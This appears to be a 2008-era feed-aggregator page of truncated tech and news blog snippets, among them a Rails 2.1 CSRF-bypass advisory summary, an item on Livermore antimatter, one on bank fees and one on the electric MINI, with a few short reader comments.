michael: Potential Circumvention of CSRF Protection in Rails 2.1 (4)
share
digg
by
Michael (71)
on
Planet RubyOnRails (1)
2 weeks
ago
permalink
There is a bug in all 2.1.x versions of Ruby on Rails which affects the effectiveness of the CSRF protection given by protect_from_forgery. By design rails does not perform token verification on requests with certain content types not typically generated by browsers. Unfortunately this list also included ‘text/plain’ which can be generated by browsers. Impact Requests can be crafted which will circumvent the CSRF protection entirely. Rails does not parse the parameters provided with these ...
Potential Circumvention of CSRF Protection in Rails 2.1 (7)
share
digg
by
Michael (71)
on
Riding Rails - home (9)
2 weeks
ago
permalink
There is a bug in all 2.1.x versions of Ruby on Rails which affects the effectiveness of the CSRF protection given by protect_from_forgery. By design rails does not perform token verification on requests with certain content types not typically generated by browsers. Unfortunately this list also included ‘text/plain’ which can be generated by browsers. Impact Requests can be crafted which will circumvent the CSRF protection entirely. Rails does not parse the parameters provided with these ...
Anti-Matter Created By Laser At Livermore (25)
share
digg
by
kdawson (121)
on
Slashdot (267)
2 weeks, 1 day
ago
permalink
zootropole alerts us to a press release issued today by Lawrence Livermore National Laboratory, announcing the production of 'billions of particles of anti-matter.' "Take a gold sample the size of the head of a push pin, shoot a laser through it, and suddenly more than 100 billion particles of anti-matter appear. The anti-matter, also known as positrons, shoots out of the target in a cone-shaped plasma 'jet.' This new ability to create a large number ...
-
Dylan Bennett said:
These guys don't watch enough sci-fi. Don't they know that antimatter containment failure is like the all-time most common reasons for the Enterprise being in jeopardy?!
-
Lee said:
WooT!!!!
Obama confuses Harvard lawyer for tech guy [Julius Genachowski] (2)
share
digg
by
Paul Boutin (7)
on
Valleywag (48)
3 weeks, 5 days
ago
permalink
I'm from MIT, so I'm hardwired to hate on Harvard Law grad Julius Genachowski, the so-called technology guy newly named to our Internet President's transition team. His company, LaunchBox, helps Web and mobile entrepreneurs pitch their ideas to get seed funding. That makes him a Paul Graham wannabe to me. He spent eight years working for Barry Diller at IAC as general counsel. Is that a plus or a minus? To be fair, Genachowski is ...
How To Avoid Record-High Bank Fees [] (1)
share
digg
by
Ben Popken (31)
on
Consumerist (68)
4 weeks, 1 day
ago
permalink
Bank fees are increasingly disproportionate to the cost of business they're supposed to cover, as shown inBankrate's latest annual survey of consumer banking costs.Average NSF (non sufficient fund) fee: $28.95, a 2.5% increase from last yearAverage ATM surcharge is $1.97, up 1%The minimum balance required to avoid fees on interest checking accounts at a brick and mortar bank: $3,461.84, up 4%The average minimum required to open an online checking account: $650.81, up $517.48Fees are designed ...
Focus Design's SBU self-balancing unicycle: because you didn't look dumb enough on a Segway (11)
share
digg
by
Paul Miller (15)
on
Engadget (496)
1 month, 1 week
ago
permalink
Filed under: Transportation The world of personal transportation, with few exceptions, has littered the earth with embarrassing paraphernalia. In-line skates, pogo sticks, the recumbent bike -- all disasters to personal style. Mix in electricity and you get the Segway, or alternatively, Focus Design's SBU electric self-balancing unicycle. The SBU can be steered by leaning left to right (like a regular unicycle) and uses Segway-style gyroscopes to power your lazy ass forwards and backwards. Not a ...
Registry Hack to Download & Install Windows Vista Service Pack 2 (SP2) Pre-Beta (1)
share
digg
by
Abdul Aziz (0)
on
Tech[dot]Blog (0)
1 month, 1 week
ago
permalink
As a part of the development and testing process, Microsoft is going to start by providing a small group of Technology Adoption Program customers with Windows Vista SP2 Beta for evaluation. Windows Vista SP2 Beta contains previously released fixes focused on addressing specific reliability, performance, and compatibility issues. In addition to previously released updates since the launch of Windows Vista SP1, Windows Vista SP2 contains the following new features: + Adds Windows Search 4.0 for ...
Sample scripts for Ruby 1.9 Symbian (1)
share
digg
by
jrobertson (James Robertson) (0)
on
DZone Snippets: ruby code (0)
1 month, 1 week
ago
permalink
Sample scripts for Ruby 1.9 Symbian release: Source: Symbian Developer Network - Community - Open source projects - Ruby 1.9 [symbian.com] = test.rb - standard test script from Ruby 1.9 source distribution (currently 6 tests of 854 fails. All failures are related to the current PIPS library implementation restrictions.) = hello.rb - basic 'Hello, world!' example. = input.rb - basic character input example (use # key for CR on phone's keypad) = fileex.rb - basic ...
Add Google Calendar and Reader to Your Gmail (57)
share
digg
by
Gina Trapani (165)
on
Lifehacker: not Windows (0)
1 month, 1 week
ago
permalink
Firefox with the Greasemonkey extension: Not since Gmail saw its interface overhaul last October has a scripter embedded Google Calendar and Reader into Gmail easily—until now. Two new user scripts integrate both Google Calendar and Google Reader onto the same screen as your email inbox. Here's what it looks like. Click on the thumbnail to see a full screen of both GCal and GReader below my list of draft email messages. There are two drawbacks ...
-
PouarK said:
Deja testé... c'est pas mal, mais on manque vite de place... donc je l'ai viré !
-
John said:
This is awesome in so many ways.
-
EROOM said:
整合google, reader and calendar
MINI E finally official, 500 available soon for US test drivers (19)
share
digg
by
Paul Miller (15)
on
Engadget (496)
1 month, 2 weeks
ago
permalink
Filed under: Transportation The much-anticipated, well-expected MINI E -- the first all-electric MINI -- is headed our way before you know it. BMW's built itself a decent performer, offering 204 hp of electric motor in a setup quite similar to the Tesla. The car boasts a 150 mile range off its 35 kWh lithium-ion battery pack, can hit 62 mph in 8.5 seconds, and does a full charge off of an included high current charging ...
Horrible (13)
share
digg
on
Rands In Repose (0)
1 month, 4 weeks
ago
permalink
I can turn a phrase. High school journalism is where I discovered this. Mrs. Wickett kept bringing stories to me in my junior year "Needs a clever headline." I'd read the story and throw out a terse, clever headline. No clue where this ability come from. If I actually think about how I pick the words and construct the idea, the ability vanishes. The less I know about it, the better. I've been riding this ...
-
Sean O said:
Everywhere I look, I see messages on modeling.
-
Bill O'Neill said:
My horrible that I've been trying to overcome is being social. Sure, I'm social with people I already know. But talking to random strangers? I'd rather balance a dyslexic's checkbook.
-
past said:
"There's a defining moment in your career when you choose to trust someone beside yourself. I'm not talking about trusting them with the small stuff: "Hey, can you fix this bug for me?" I'm talking about big trust "Hey, your design sense is 10x mine, what the hell is wrong with this dialog? Be brutal."It's tricky to leave that swell little island of you. It's hard to suck up your pride and acknowledge there are those who excel where you suck. But whether you're an individual or a manager, your job is to learn to scale at what makes you great. Yes, you want to fill your professional experience gaps, but if you work where I work, you're in a hurry. Getting anything done requires a balance of your natural talent and your ability to find and leverage the talents of those around you."
-
James Williams (willia4) said:
I've never really sat down and tried to figure out exactly what my "Horrible" is. Maybe I should do that. (Of course, the real trick will be limiting it to fewer than a dozen discrete things...)
iPhone Antitrust and Computer Fraud Claims Upheld (1)
share
digg
by
ScuttleMonkey (23)
on
Slashdot (267)
2 months
ago
permalink
LawWatcher writes "On October 1, 2008, a federal judge in California upheld a class action claiming that Apple and AT&T Mobility's five-year exclusive voice and data service provider agreement for the iPhone violates the anti-monopoly provisions of the antitrust laws. The court also ruled that Apple may have violated federal and California criminal computer fraud and abuse statutes by releasing version 1.1.1 of its iPhone operating software when Apple knew that doing so would damage ...
Dell Mini 9 hacked to run OS X (4)
share
digg
by
Nilay Patel (30)
on
Engadget (496)
2 months
ago
permalink
Filed under: Laptops We're assuming Apple will eventually give up and release a netbook of its own, but until then Steve had better get used to seeing OS X hacked to run on all manner of tiny laptops -- the latest to make the switch is Dell's Inspiron Mini 9. Nothing too complicated about this hack, since most of the work was already done for the internally-similar MSI Wind, but you'll have to dig up ...
French newspaper says Macs cause cancer [Apple] (2)
share
digg
by
Nicholas Carlson (26)
on
Valleywag (48)
2 months
ago
permalink
The Liberation of France says an oft-noticed smell emitted by Apple's Mac Pro desktop computers is caused by a combination of toxins, including benzene, which is known to cause leukemia. The questions now have to be: What did Apple know and when did Apple know it? Posts in Apple support forums, full of Mac Pro owners complaining of the smell, indicate Apple was well-aware of how their computers smell. One owner writes, "They guy in ...
Direct public funding of science (1)
share
digg
by
Syam Anand (0)
on
fundscience.org (0)
2 months
ago
permalink
Currently, NIH funds the majority of biology research in USA using taxpayer dollars. The success of the NIH system and the adaptation of the scientific community to NIH have made this system stable and dependable. A significant amount of additional support for biology research, especially health related research, also comes from foundations. Some of them such as Bill&Melinda Gates foundation, and Howard Hughes Medical Institute provide substantial financial support far exceeding and often more attractive ...
VIDEO: Post Implosion, Old WaMu Ad Has New, Dark, Meaning [Washington Mutual] (2)
share
digg
by
Ben Popken (31)
on
Consumerist (68)
2 months, 1 week
ago
permalink
Now that Washington Mutual completely imploded on its garbage-pile avalanche of home mortgages, this old WaMu commercial from August 2006 takes on a new, darker, meaning... ANNOUNCER: The uncertainty of getting a home loan made Paul irritable. Paul pops child's balloon. ANNOUNCER:Then he went to Washington Mutual. Thanks to their flexible lending rules, he got quick approval. Now he's always in a GREAT mood. A series of horrible things happen to Paul, but he remains ...
Our Innaugural Post (1)
share
digg
by
David (52)
on
fundscience.org (0)
2 months, 2 weeks
ago
permalink
Hello, I’m David Vitrant the Executive Director of FundScience Inc. Here at FundScience we are looking to get the public to fund individual pilot research projects. This will drive innovation in many scientific fields, and open up complex scientific discussions to the public. In the end research is meant to help understand nature and for the benefit of society in general. With our blogs, wiki’s, forums, and soon project proposals we hope to bring a ...
Dilbert Daily Strip (59) permalink
Shared by Alan Dean (29) Alexey Pegov (1) andrefaria (3) blntechie (5) Chris Olstrom (2) Daniel Johnson, Jr. (2) Ekaterina (1) Eva (0) Friday (1) Ian (0) Jade Robbins (7) Jay Mari (20) John (2) johnk (1) Jonjon (0) Mark (0) Michael (2) Mike (0) Mike P (0) mkl (17) Pramod (11) Robert Owens (1) rOckY (27) Roger Chen (5) Ryan Kennedy (5) Steve (1) Zsoltik@ (0)Contribute comment
